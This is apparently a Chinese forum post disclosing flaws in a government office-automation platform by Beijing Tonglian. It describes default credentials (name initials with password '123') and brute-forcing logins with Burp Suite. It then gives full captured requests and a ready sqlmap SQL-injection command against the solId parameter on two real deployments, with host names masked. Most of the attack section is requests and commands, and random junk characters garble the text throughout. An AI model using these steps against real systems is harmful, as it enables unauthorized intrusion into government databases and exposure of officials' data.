+ Y5 P G- X4 [( a( |1 t
0 `( J" N! X; T; |0 z * e: u v/ C; |' O# }5 ^
- z3 M9 }' S: y0 U5 p 平台简介:
1 A* I8 G7 K2 d5 `+ T& _+ `" M7 i9 | / X3 _' ]% c: h% U5 X/ G
# S" V3 Q( K( m I7 _& U9 A 1 `% M0 ^; |! L+ W
4 ^* {/ C+ U6 |0 K& n- E' g
- Z- }9 q' S! z: o [" N
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 a4 B9 t, ?9 K7 o同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 4 a7 F, c# Z; T& m
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 [0 u& F. V9 P+ a9 v
% a) V; `6 \( t) q+ _
; A. }) ~0 ?/ j+ A % v" n2 E# p# j; y w0 s% M
- M' l% U! R8 E0 p7 @6 R' J Q* X- p* }# }/ l/ R* ?
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
. M. f% r, @) l: _/ Z1 i8 O G6 n { t0 `+ j5 l- }, \$ y7 f7 H
n/ y9 o a+ ]/ J5 z3 P1 o, `0 w
) \$ v8 _- `* |: @; O1 H, q# B6 `2 `
! K9 m1 Q, r% K
7 ?. s1 V. S" Z$ z* c
http://1.1.1.1:7197/cap-aco/#(案例2-)
1 `' {3 k' S- M' I. R1 Z. s: m
, v3 j/ n U6 t& V! n# E( D3 O& q: A2 b' E% Y& T: g2 A
http://www.XXOO.com (案例1-官网网站)( E3 b7 B; ^$ {; p' ]1 l
* E/ T: B, x+ X; {4 ~3 _3 G7 o2 `2 w$ o5 A$ l
0 }: l% h: G; Q9 b U
3 E$ k9 ?" b1 | @" T1 r: b; a' G' e' Q J1 X% ~
漏洞详情:
0 g% _: v) o7 _' P3 p
3 \2 ^& p5 P9 J$ e) Q: U9 F& A2 H8 }) O- b9 p
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试4 W' L6 H/ c+ w% S' [0 A9 P+ g; {
) K) O; x: s& @
" q% d9 k+ W1 f) f% O 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:' n/ ]6 m4 K( y" S1 [& C$ u
1 B4 e) B ?$ b0 M- q: `$ A, ~! R" d* t) w; F2 e) [
: m( L9 z( x' u% J4 j: O- A+ a7 n/ { $ |* m, r- Y8 ?0 M- S# }
! O/ R0 D6 y( z, q
- k I6 F4 j8 U' ~/ `) m. N
8 J' U. m) j' }7 z5 ^8 ^5 [% L& A3 |% L$ R7 h
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:7 _4 B8 Z$ U7 h. z" W9 k0 b
5 y: B9 u. {! A/ r/ T8 ~& X
" C9 u( X' Y M5 X- R1 K+ A1 f8 w0 ` 1、案例1-官方网站) B+ A% k8 o2 A: a
' r' w5 J: H3 f: n
7 p/ T& R8 g+ l$ v; h! k' q. M GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
- g7 D3 o0 ^1 h% W, R" N4 x $ @$ ^7 M. r& r0 p4 b7 b( n, Z
8 F, Y( |& l$ {: G" ^- Q
Host: www.XXOO.com0 j+ Y0 f/ y% P- I! t
8 [6 w4 _) E& P' }9 B) f. ^( j! r
( G* g* Q* m1 N$ o6 N0 z
Proxy-Connection: Keep-Alive
& I3 `# K; j# x6 c9 {- _ # |( [+ a8 \/ @
# A; t1 X* l! p3 @
Accept: application/json, text/javascript, */*; q=0.016 B+ M9 D4 o, Z: e7 n
; g1 q" X1 p. X( @
; l5 X4 l0 A: o$ `' a* u1 I/ w Accept-Language: zh-CN
8 F( H5 J9 v( k) I( C0 Q6 V' G6 @1 u
- M) `! _" G, ?( D' ^ D
, x9 i! E; a, M& K0 F4 O Content-Type: application/json+ L3 E; a/ v' `" V1 ~
' k9 V9 D$ q+ P( I+ O- k7 s
" @3 W% h+ a% v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
4 S9 u/ r j7 F, e8 t, C& R
' [/ q1 s4 Q! I0 h5 f) s5 B
% i: v! M7 C3 I7 k# v+ Y4 ^! W/ k X-Requested-With: XMLHttpRequest
- \3 m6 Q! S2 e! h
1 \+ n/ {$ E0 E. z O* I: v
5 Z* L* Y* W3 u, r' A" v Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
7 N! x) d. t3 ]( X: ]
: R2 R) n- C8 h$ M0 {3 P L) S' k P- w. y( N
Accept-Encoding: gzip, deflate, sdch% X) _- i* @; y5 j2 Q3 [; v: _
9 d0 p; N& i; `* P6 u3 K3 }
9 I% \$ |; W, C; H Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( r1 l+ L y- l. D. l! M
9 D! ?' Y. O x
b& s/ N2 N& O) h; q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% y$ _1 s! u2 A. j; T
8 }/ O% b: s0 R
' B3 n% {* t# c& E7 b- ~; m' f
4 o5 w8 t; H6 {* f0 f) G
4 [. x0 X# C+ p
9 |$ r% ] a7 O' L8 E 3 ]5 f" {& @$ I2 S, m4 g' r" i4 X3 S
6 w" O; z5 [% d% f% R. U
" l7 ]) R+ D; C" T- b! C/ ~! l 7 ~0 R3 w* p C. q
& q. S3 q2 Y u5 ]( a( N
4 E4 M a$ I; `' P/ l5 i1 L0 b
4 s r; k3 W" C9 j9 D4 C; @ * T- @/ u ~( ~; M) t* G: Q
/ \. N; a# H4 R- m
6 t8 U% k0 |' T0 d0 p
' O* h: i5 E# } A, P
$ F0 f6 L% Z7 ?: @( W 2、案例2-某天河云平台9 W/ u1 y; `' B& L6 f
( I# ]3 O+ f6 \( h! C; b
3 ^6 o4 r! p! ~6 X6 O- S GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
$ ]/ @% A* ^( v; e( W2 ]" j
9 g1 C+ h/ r6 Y
* \) `7 J1 t1 h# D1 L3 | Host: 1.1.1.:7197
' s# }8 K1 o8 k; g. q % `/ ~: z5 ` }8 o
/ q. N. l4 A# O8 [5 W+ s4 Y
Accept: application/json, text/javascript, */*; q=0.01, T, m6 G. I' P% @' P
0 M/ m. d5 x5 U& I& q& K* B% M- K% x' Y5 z- S
X-Requested-With: XMLHttpRequest
: k) A8 w; ?. C+ u , G9 s7 U! U4 b1 Y3 ^6 p0 }
5 E( U- l2 R: w
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 B a6 M e. ]; e
( Z) p/ t$ D" J( w0 ]& ]
: H% u' e. P" p/ ?$ ?8 q+ i Content-Type: application/json) q. B4 n' L1 x4 J0 ~: f' Q9 t
: S$ X; ?' h: ?) S) A# w8 q1 ]' E$ m9 e+ {% V+ K7 W) c2 y2 q1 s% I
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008, A! w3 P( }) E! ^1 Z3 F
+ S' W+ L5 j4 Z/ n# I5 d
, @' D# _6 f! t6 l8 ~8 k( Z% ]% d4 v Accept-Language: zh-CN,zh;q=0.8
, |4 W) e6 W: J6 ? * u. @% N9 \* e9 |( x% \, s
% J) T" j5 ^1 ]9 i& D Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
1 E8 r+ l# h$ L3 v; U; r% j
8 K' ~4 R5 i/ P5 Z! ~ s8 h& _% V. B" b) P
Connection: close
9 x% y0 t5 o9 K* n& Y# e- ~ * b! }/ j' ]4 c
6 U! @0 O8 J Y3 y; f 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
" M0 P, Z9 ~3 o 0 N) i) F& Z- u8 f( _; T
- Q% N) `. G E: p& Y! F& T ) I9 L3 n* S3 U# c6 V
' @2 J; T5 a% R0 ?) |
9 i) ^( V9 [* K! F+ w) C
; b2 A$ e' j$ J |